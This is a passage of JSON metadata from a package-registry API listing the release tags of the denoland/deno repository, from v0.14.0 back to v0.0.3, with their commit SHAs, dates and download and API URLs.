48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denol